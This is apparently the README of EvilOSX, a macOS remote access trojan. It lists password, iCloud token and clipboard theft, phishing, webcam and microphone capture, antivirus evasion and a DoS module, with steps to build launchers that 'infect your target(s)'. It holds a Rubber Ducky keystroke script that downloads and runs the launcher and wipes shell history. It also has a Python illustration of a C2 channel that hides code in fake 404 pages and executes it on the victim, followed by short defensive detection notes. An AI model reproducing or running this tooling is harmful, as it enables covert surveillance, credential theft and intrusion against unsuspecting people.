# EvilOSX

![EvilOSX logo](https://i.imgur.com/x3ilHQi.png)

An evil RAT (Remote Administration Tool) for macOS / OS X.

[License: GPLv3](https://github.com/Marten4n6/EvilOSX/blob/master/LICENSE.txt) · Python 2.7, 3.7 · [Issues](https://github.com/Marten4n6/EvilOSX/issues) · [Build](https://travis-ci.org/Marten4n6/EvilOSX) · [Contributions welcome](https://github.com/Marten4n6/EvilOSX/blob/master/CONTRIBUTING.md) · [Macro Generator by Cedric Owens](https://github.com/cedowens/EvilOSX_MacroGenerator)

**This project is no longer active.**

## Features

- Emulate a terminal instance
- Simple extendable module system
- No bot dependencies (pure python)
- Undetected by anti-virus (OpenSSL [AES-256](https://en.wikipedia.org/wiki/Advanced_Encryption_Standard) encrypted payloads)
- Persistent
- GUI and CLI support
- Retrieve Chrome passwords
- Retrieve iCloud tokens and contacts
- Retrieve/monitor the clipboard
- Retrieve browser history (Chrome and Safari)
- Phish for iCloud passwords via iTunes
- iTunes (iOS) backup enumeration
- Record the microphone
- Take a desktop screenshot or picture using the webcam
- Attempt to get root via local privilege escalation

## How To Use

**Warning:** Because payloads are created unique to the target system (automatically by the server), the server must be running when any bot connects for the first time.
```bash
# Clone or download this repository
$ git clone https://github.com/Marten4n6/EvilOSX

# Go into the repository
$ cd EvilOSX

# Install dependencies required by the server
$ sudo pip install -r requirements.txt

# Start the GUI
$ python start.py

# Create a launcher to infect your target(s)
$ python start.py --builder

# Lastly, run a built launcher on your target(s)
```

### Advanced users

There's also a CLI for those who want to use this over SSH (build the launcher with `--builder` as above first):

```bash
# Start the CLI
$ python start.py --cli --port 1337

# Lastly, run a built launcher on your target(s)
```

## Screenshots

CLI session (transcribed from the screenshot):

```text
[I] Server started, waiting for connections...
[I] Type "help" to show the help menu.

help                  Show this help menu.
bots <page>           Show the amount of available bots.
connect <id>          Start interacting with the bot (required before using "use").
modules               Show a list of available modules.
use <module_name>     Run the module on the connected bot.
stop                  Ask the module to stop executing.
setall <module_name>  Set the module which will be run on every bot.
stopall               Clear the globally set module.
clear                 Clear the screen.
exit/q/quit           Close the server and exit.

[I] No page specified, showing the first page.
[I] Use "bots <page>" to see a different page (each page is 10 results).
= "bot@botnet" (last seen: Fri, Jul 26 @ 12:45:36)
[I] Connected to "bot@botnet", ready to send commands.
[I] Type "use <module_name>" to use a module.

CVE-2015-5889     Attempt to get root via CVE-2015-5889 (10.9.5 to 10.10.5).
get_backups       Show a list of devices backed up by iTunes.
get_info          Return basic information about the bot.
icloud_contacts   Retrieve iCloud contacts.
update_bot        Update the bot to the latest (local) version.
chrome_passwords  Retrieve Chrome passwords.
```
Module list (continued from the CLI session above):

```text
decrypt_mme       Retrieve iCloud and MMe authorization tokens.
phish_itunes      Phish the bot for their iCloud password via iTunes.
microphone        Record the microphone.
webcam            Take a picture using the bot's webcam.
slowloris         Perform a slowloris DoS attack.
upload            Upload a file to the bot.
screenshot        Take a screenshot of the bot's screen.
download          Download a file or directory from the bot.
remove_bot        Remove EvilOSX from the bot.
clipboard         Retrieve or monitor the bot's clipboard.
browser_history   Retrieve browser history (Chrome and Safari).
```

GUI (transcribed from the screenshot): tabs Home, Control, Broadcast and Builder; a bot table with the columns UID, Username, Version and Last Seen; and an Execute panel showing Command type: Module, Module name: microphone, Time in seconds to record (leave empty for 5), Remote output directory (leave empty for /tmp) and Remote output name (leave empty for the default).

## Motivation

This project was created to be used with my [Rubber Ducky](https://hakshop.com/products/usb-rubber-ducky-deluxe) (the script is reproduced below).

It takes about 10 seconds to backdoor any unlocked Mac, which is...... nice.

"Termina" is spelt that way intentionally: on some systems Spotlight won't find the Terminal otherwise.

To bypass the keyboard setup assistant make sure you change the VID&PID, which can be found [here](https://ducktoolkit.com/vidpid/). Aluminum Keyboard (ISO) is probably the one you are looking for.

## Versioning

EvilOSX will be maintained under the [Semantic Versioning](https://semver.org/) guidelines as much as possible. Server and bot releases will be numbered with the following format:

`<major>.<minor>.<patch>`

And constructed with the following guidelines:

- Breaking backward compatibility (with older bots) bumps the major
- New additions without breaking backward compatibility bumps the minor
- Bug fixes and misc changes bump the patch

For more information on SemVer, please visit https://semver.org/.
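The Design Notes below describe the bot/server channel: modules are plain Python source plus options, shipped zlib-compressed; the server answers with what looks like an ordinary HTTP 404 page; only the bot ever initiates contact (a GET to fetch a command, a POST to return output), so the server can only infer that a bot has gone away. The Python below is an added illustration written for this page, not EvilOSX's own code. The concrete wire format (a base64 blob inside an HTML comment, a JSON envelope, a `run(config)` entry point), the in-memory `Server` stand-in and its `stale_after` threshold are assumptions made for the example; the sample module and the bot/timestamp values are constructed.

```python
"""Added illustration (not EvilOSX code) of a 404-page C2 channel:
module source + options -> zlib -> base64 -> hidden in a fake 404,
fetched by the bot with a GET, output returned with a POST.
Wire format, envelope, run(config) and stale_after are assumptions."""
import base64
import json
import zlib

# Constructed sample module: the bot exec()s the source and calls run(config).
SAMPLE_MODULE_SOURCE = '''
def run(config):
    seconds = int(config.get("seconds", 5))
    return "recorded microphone for %d seconds" % seconds
'''

# Assumed carrier page: the text between "<!-- " and " -->" is the payload.
FAKE_404 = (
    "HTTP/1.1 404 Not Found\r\nContent-Type: text/html\r\n\r\n"
    "<html><head><title>404 Not Found</title></head>\n"
    "<body><h1>Not Found</h1>\n"
    "<p>The requested URL was not found on this server.</p>\n"
    "<!-- {blob} -->\n</body></html>\n"
)


def pack_module(name, source, config):
    """Server side: name, source and options -> JSON -> zlib -> base64."""
    envelope = json.dumps({"module": name, "source": source, "config": config})
    return base64.b64encode(zlib.compress(envelope.encode())).decode()


def unpack_module(blob):
    """Bot side: reverse of pack_module."""
    envelope = json.loads(zlib.decompress(base64.b64decode(blob)).decode())
    return envelope["module"], envelope["source"], envelope["config"]


def extract_blob(http_response):
    """Bot side: hidden blob from the HTML comment, or None if the 404 is empty."""
    start = http_response.find("<!-- ")
    end = http_response.find(" -->", start)
    if start == -1 or end == -1:
        return None
    return http_response[start + 5:end].strip() or None


def run_module(source, config):
    """Bot side: load the received source into a fresh namespace, call run().
    Whatever the server sends is executed as-is: remote code execution by design."""
    namespace = {}
    exec(source, namespace)
    return namespace["run"](config)


class Server:
    """In-memory stand-in for the C2 server. last_seen, updated on every GET and
    POST, is the only liveness signal it ever gets about a bot."""

    def __init__(self, stale_after=60.0):
        self.stale_after = stale_after
        self.queue, self.results, self.last_seen = {}, {}, {}

    def queue_module(self, bot_uid, name, source, config):
        self.queue[bot_uid] = (name, source, config)

    def handle_get(self, bot_uid, now):
        """Bot asks for a command: always answered with a 404 page."""
        self.last_seen[bot_uid] = now
        job = self.queue.pop(bot_uid, None)
        return FAKE_404.format(blob=pack_module(*job) if job else "")

    def handle_post(self, bot_uid, module_name, output, now):
        """Bot returns a module's output."""
        self.last_seen[bot_uid] = now
        self.results.setdefault(bot_uid, []).append((module_name, output))

    def is_stale(self, bot_uid, now):
        """Inferred 'offline': no poll within stale_after seconds."""
        seen = self.last_seen.get(bot_uid)
        return seen is None or now - seen > self.stale_after


def bot_cycle(server, bot_uid, now):
    """One poll: GET, unpack if something was hidden, run it, POST the output.
    Returns the output, or None when the 404 carried nothing."""
    blob = extract_blob(server.handle_get(bot_uid, now))
    if blob is None:
        return None
    name, source, config = unpack_module(blob)
    output = run_module(source, config)
    server.handle_post(bot_uid, name, output, now)
    return output


def demo():
    """End-to-end run on constructed data: (outputs, staleness at two times)."""
    server = Server(stale_after=60.0)
    server.queue_module("bot-1", "microphone", SAMPLE_MODULE_SOURCE, {"seconds": 3})
    first = bot_cycle(server, "bot-1", now=1000.0)   # module delivered and run
    second = bot_cycle(server, "bot-1", now=1010.0)  # empty 404, nothing queued
    return (first, second), (server.is_stale("bot-1", 1030.0),
                             server.is_stale("bot-1", 1100.0))


if __name__ == "__main__":
    print(demo())
```

Two things worth taking from this on the defensive side. First, the channel is only "hidden" at the HTTP status level: a process that keeps polling one host, always receives 404 pages whose comment bodies are a few kilobytes of base64, and then POSTs to the same host is a recognisable pattern on its own. Second, because the bot never accepts inbound connections, the operator's only health signal is `last_seen`, which is why the Design Notes say the server cannot know when a bot goes offline.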
The Rubber Ducky script referred to under Motivation:

```text
REM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX
REM See also: https://ducktoolkit.com/vidpid/
DELAY 1000
GUI SPACE
DELAY 500
REM "Termina" is intentional, see the note under Motivation
STRING Termina
DELAY 1000
ENTER
DELAY 1500
REM Kill all terminals after x seconds
STRING screen -dm bash -c 'sleep 6; killall Terminal'
ENTER
REM Fetch the launcher into /tmp, run it, then wipe the shell history
STRING cd /tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear
ENTER
```

## Design Notes

Infecting a machine is split up into three parts:

- A launcher is run on the target machine whose only goal is to run the stager
- The stager asks the server for a loader which handles how a payload will be loaded
- The loader is given a uniquely encrypted payload and then sent back to the stager

Communication between bot and server:

- The server hides its communications by sending messages hidden in HTTP 404 error pages (from BlackHat's "Hiding In Plain Sight")
- Command requests are retrieved from the server via a GET request
- Command responses are sent to the server via a POST request
- Modules take advantage of python's dynamic nature: they are simply sent over the network compressed with [zlib](https://www.zlib.net/), along with any configuration options
- Since the bot only communicates with the server and never the other way around, the server has no way of knowing when a bot goes offline

## Issues

Feel free to submit any issues or feature requests [here](https://github.com/Marten4n6/EvilOSX/issues).

## Contributing

For a simple guide on how to create modules click [here](https://github.com/Marten4n6/EvilOSX/blob/master/CONTRIBUTING.md).

## Credits

- The awesome [Empire](https://github.com/EmpireProject) project
- Shoutout to [Patrick Wardle](https://twitter.com/patrickwardle) for his awesome talks, check out [Objective-See](https://objective-see.com/)
- manwhoami for his projects: OSXChromeDecrypt, MMeTokenDecrypt, iCloudContacts (now deleted...
  let me know if you reappear)
- The slowloris module is pretty much copied from [PySlowLoris](https://github.com/ProjectMayhem/PySlowLoris)
- [urwid](http://urwid.org/) and [this code](https://github.com/izderadicka/xmpp-tester/blob/master/commander.py) which saved me a lot of time with the CLI
- Logo created by [motusora](https://www.behance.net/motusora)

## License

[GPLv3](https://github.com/Marten4n6/EvilOSX/blob/master/LICENSE.txt)